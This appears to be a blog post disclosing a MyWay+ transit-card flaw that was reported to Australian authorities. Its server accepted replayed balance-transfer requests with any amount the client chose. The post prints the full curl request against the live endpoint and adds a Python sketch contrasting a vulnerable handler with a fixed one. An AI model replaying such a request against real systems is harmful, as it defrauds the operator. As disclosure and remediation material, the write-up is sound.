MyWay+'s infinite money glitch

On the 27th of November at 8:29pm, I sent an email to an ASD defence.gov.au address detailing a trivial infinite money glitch in MyWay+.

Between 8:44 and 9:42 of the same day, a Canberra local (who we will call Alice) was live posting about some problems they were having transferring funds from their old myway card to myway+.

8:44:
Alice
i’ve managed to get in through the in-app browser but balance transfer keeps failing with an in server error lol
oop looks like it’s gone through but returned an error :KEKW:
balance has been claimed but there’s nothing on my account :concern:
is $13 worth calling TC over
9:36:
Alice
ok i don’t think im gonna call now [image of a $40 account balance]
ok so did the transaction go through the backend despite the backend check failing and throwing 500, or is the restriction on transferring card value on the frontend and bypassable by just sending more requests
18:44:
Alice
i’m not at a computer rn otherwise i would be trying this but try claiming an already transferred card, duck into the html and delete the disabled attribute on the submit button if there is. see if it makes a call to the back and if that has a checker
cos i’m still perplexed that i managed to claim the same card 3 times because it automatically retried a request 3 times

This of course intrigued me. Surely they aren't just doing trivial client-side validation, right? Surely not.

Bob
Removing the disabled attr does not work

Ok, so the easiest attack doesn't work.

Faythe
Infinite money glitch
Alice
damn, other thing to try is just replay the request it makes when you claim one of your unclaimed cards

As it turns out, this works. The backend doesn't check that the card has already been claimed, and it doesn't even check that the balance you claim matches what was on the card. That means that running this command:

curl 'https://api.abt.prod-tc.nec.com.au/web-portal-business-service/abt/wpbs/c-portal/balance-transfer/transfer-card-balance' \
  -X POST -H 'Accept: application/json' -H 'Content-Type: application/json' -H 'authorization: Bearer == INSERT YOUR TOKEN HERE ==' \
  -H 'Origin: https://mywayplus.transport.act.gov.au' -H 'Connection: keep-alive' \
  -H 'Sec-Fetch-Dest: empty' -H 'Sec-Fetch-Mode: cors' -H 'Sec-Fetch-Site: cross-site' -H 'Pragma: no-cache' \
  -H 'Cache-Control: no-cache' -H 'TE: trailers' \
  --data-raw '[{"mywayCardId":"==any myway card==", "purchaseType":"00010", "purchasePoint":"00001", "paymentType":"BT", "userId":"==user id==", "cardBalance":0.69, "companyId":5, "createdBy":"==user id==", "updatedBy":"==user id=="}]'

will result in a 69c transaction appearing in your account. You could change cardBalance to be whatever you want and run the request as many times as you wanted.
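To make the backend defect concrete, here is an added illustration (my own sketch for this write-up, not NEC's or the ACT government's code; the ledger model, field handling and error types are assumptions). The vulnerable handler mirrors what the post describes: it credits whatever cardBalance the client sends, every time it is sent. The hardened handler ignores the client-supplied amount, credits only the balance the operator's own ledger holds for that card, checks the card is registered to the requesting user, and claims the card at most once under a lock, so replays and the app's automatic retries are rejected rather than credited.

```python
"""Added example: server-side validation for a card balance transfer.

Illustrative code written for this write-up, not the operator's implementation.
The data model, field names beyond those in the captured request, and the error
type are assumptions.  Balances are integer cents to avoid float arithmetic.
"""
import threading
from dataclasses import dataclass, field


@dataclass
class Card:
    balance_cents: int          # balance the operator's ledger holds for the card
    owner_id: str               # user the physical card is registered to
    claimed: bool = False       # set once the balance has been transferred


@dataclass
class Ledger:
    cards: dict = field(default_factory=dict)       # card id -> Card
    accounts: dict = field(default_factory=dict)    # user id -> balance in cents
    lock: threading.Lock = field(default_factory=threading.Lock)


class TransferError(Exception):
    """Raised by the hardened handler when a transfer must be refused."""


# --- Vulnerable variant: the behaviour the post describes --------------------
def transfer_vulnerable(ledger: Ledger, user_id: str, req: dict) -> int:
    """Credits the client-supplied 'cardBalance' and never marks the card claimed."""
    cents = int(round(req["cardBalance"] * 100))   # amount is under client control
    ledger.accounts[user_id] = ledger.accounts.get(user_id, 0) + cents
    return ledger.accounts[user_id]


# --- Hardened variant ---------------------------------------------------------
def transfer_hardened(ledger: Ledger, user_id: str, req: dict) -> int:
    """Credits the ledger's own balance for the card, exactly once.

    The client-supplied 'cardBalance' is deliberately never read.
    """
    card_id = req["mywayCardId"]
    with ledger.lock:                        # claim check + credit must be atomic
        card = ledger.cards.get(card_id)
        if card is None:
            raise TransferError("unknown card")
        if card.owner_id != user_id:
            raise TransferError("card not registered to this user")
        if card.claimed:
            # Replays and automatic retries land here instead of crediting again.
            raise TransferError("card balance already transferred")
        card.claimed = True
        ledger.accounts[user_id] = ledger.accounts.get(user_id, 0) + card.balance_cents
        return ledger.accounts[user_id]


def demo() -> tuple:
    """Constructed scenario: a card holding $13.00, a request carrying an
    inflated cardBalance of $40.00, sent three times (the app's retries).
    Returns (vulnerable_account_cents, hardened_account_cents)."""
    request = {"mywayCardId": "card-1", "paymentType": "BT", "cardBalance": 40.0}
    vuln = Ledger(cards={"card-1": Card(1300, "alice")})
    hard = Ledger(cards={"card-1": Card(1300, "alice")})
    for _ in range(3):
        transfer_vulnerable(vuln, "alice", request)
        try:
            transfer_hardened(hard, "alice", request)
        except TransferError:
            pass                             # second and third attempts are refused
    return vuln.accounts["alice"], hard.accounts["alice"]


if __name__ == "__main__":
    print(demo())   # (12000, 1300)
```

The key design point is that the credited amount comes from a lookup keyed by the card id, so the request body cannot influence it, and the "already claimed" check and the credit happen under one lock (in a real deployment, one database transaction with a unique constraint on the claim), which is what makes the operation idempotent under retries.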

Bob
Fun fact: I did not have a myway card with 69c on it
That is funny
Alice
heh
Bob
I should probably write an actual disclosure of this.

And that leads me to how I ended up writing an email to ASD cyber assist at 8:29pm. They got back to me at 12 minutes past midnight, saying they had notified the ACT government.

A few days later, I remember reading someone complaining on reddit that balance transfer had been temporarily disabled.

There have been additional limits placed on balance transfers. These limits mean that a myway card that I never transferred can no longer be transferred. Oh well, I guess the ACT government just stole like $110 from me :bkcry:

If you are looking to build a transport ticketing system, steer clear of NEC's ABT (Account Based Ticketing) system. They don't know how to handle your money (in more ways than one...)